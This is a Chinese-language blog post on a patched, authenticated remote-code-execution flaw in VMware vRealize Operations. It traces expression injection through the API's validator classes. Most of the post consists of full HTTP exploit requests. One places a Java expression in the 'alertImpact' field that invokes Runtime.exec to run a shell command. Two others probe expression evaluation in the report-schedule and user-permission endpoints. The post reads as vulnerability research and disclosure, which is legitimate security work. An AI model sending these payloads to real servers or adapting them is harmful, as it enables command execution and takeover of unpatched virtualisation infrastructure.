官方已经发布漏洞补丁 https://www.vmware.com/security/advisories/VMSA-2023-0009.html 公开文章
这个漏洞是看了mr_me的文章之后 https://trenchant.io/vmware-workspace-one-access/ 顺手看了看vROPS,发现也存在这个漏洞,于是有此文,漏洞比较简单,下面简单写一下。这是一个授权后的RCE漏洞。
com.vmware.ops.api.model.validation.AlertQueryValidator
向上回溯,该验证器的注解为AlertQueryValidate
该注解被用在com.vmware.ops.api.model.alerts.AlertQuery
实体类上,找该实体类在哪用到了即可
com.vmware.ops.api.server.controller.AlertControllers.AlertQueryAndManagementController#queryAlert
1
2
3
4
| public Alert.Alerts queryAlert(@BodyRequest(value = "The alertQuery criteria",required = true,examples = @Example({@ExampleProperty("StubFactory#alertQuery")})) @RequestBody @Valid AlertQuery alertQuery) {
this.logger.info("Alert query = " + alertQuery);
return this.alertService.queryForAlerts(alertQuery);
}
|
典中典写法,exp如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
| POST /suite-api/api/alerts/query?page=1&pageSize=1000&_no_links=true HTTP/2
Host: 192.168.1.166
Content-Length: 1032
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: vRealizeOpsToken 762927f0-2266-4734-ada9-84fcc4b67feb::c65bf5b6-812f-45e5-bf4e-2ea405c4fca7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.166
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.166/suite-api/doc/swagger-ui.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
{
"compositeOperator": "AND",
"resource-query": {
"name": [
"Windows2017V1M",
"Windows2018VM"
],
"regex": [
"\\\\S+-BNA-\\\\S+",
null
],
"adapterKind": [
"VMWARE"
],
"resourceKind": [
"HostSystem"
],
"resourceId": [
"9400ffc4-8ebb-4c43-a356-dd70b378124b"
],
"statKeyInclusive": true
},
"alertImpact": [
"a${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'touch /tmp/asd')}"
],
"activeOnly": true,
"alertCriticality": [
"CRITICAL",
"IMMEDIATE",
"WARNING",
"INFORMATION"
],
"startTimeRange": {
"startTime": 1677826944,
"endTime": 1677836944
},
"includeChildrenResources": true,
"extractOwnerName": false
}
|
如此还能找到很多
com.vmware.ops.api.model.validation.ReportScheduleValidator
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| POST /suite-api/api/reportdefinitions/c5035738-f909-474e-8ae0-4c5429ff384f/schedules?_no_links=true HTTP/2
Host: 192.168.1.166
Content-Length: 477
Sec-Ch-Ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: vRealizeOpsToken 762927f0-2266-4734-ada9-84fcc4b67feb::65e1c585-1111-473b-884d-f022cd1b8e06
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
X-Vrealizeops-Api-Timezone: GMT
Content-Type: application/json
Accept: application/json
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.166
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.166/suite-api/doc/swagger-ui.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
{
"reportDefinitionId" : "63925ab5-5dd8-4b6d-b50b-1f9e2936e91f",
"resourceId" : [ "5715b47f-ebf6-4d58-a2f7-019fb8506a78" ],
"traversalSpec" : {
"name" : "Traversal spec name",
"rootAdapterKindKey" : "VMWARE",
"rootResourceKindKey" : "VM",
"adapterInstanceAssociation" : false
},
"startDate" : "4/30/15 ${99-2}",
"reportScheduleType" : "WEEKLY",
"daysOfTheWeek" : [ "SUNDAY", "MONDAY" ],
"startHour" : 1,
"startMinute" : 0,
"recurrence" : 2
}
|
com.vmware.ops.api.model.validation.RolePermissionValidator
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| PUT /suite-api/api/auth/users/5c57c63e-bc16-4f81-9309-5d7f1369bfe7/permissions?_no_links=true HTTP/2
Host: 192.168.1.166
Content-Length: 88
Sec-Ch-Ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: vRealizeOpsToken 762927f0-2266-4734-ada9-84fcc4b67feb::65e1c585-1111-473b-884d-f022cd1b8e06
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.166
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.166/suite-api/doc/swagger-ui.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
{"traversal-spec-instances":[{"adapterKind":"a${99-12}"},{"adapterKind":"a${99-12}"}]}
|
捡的漏洞罢了
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。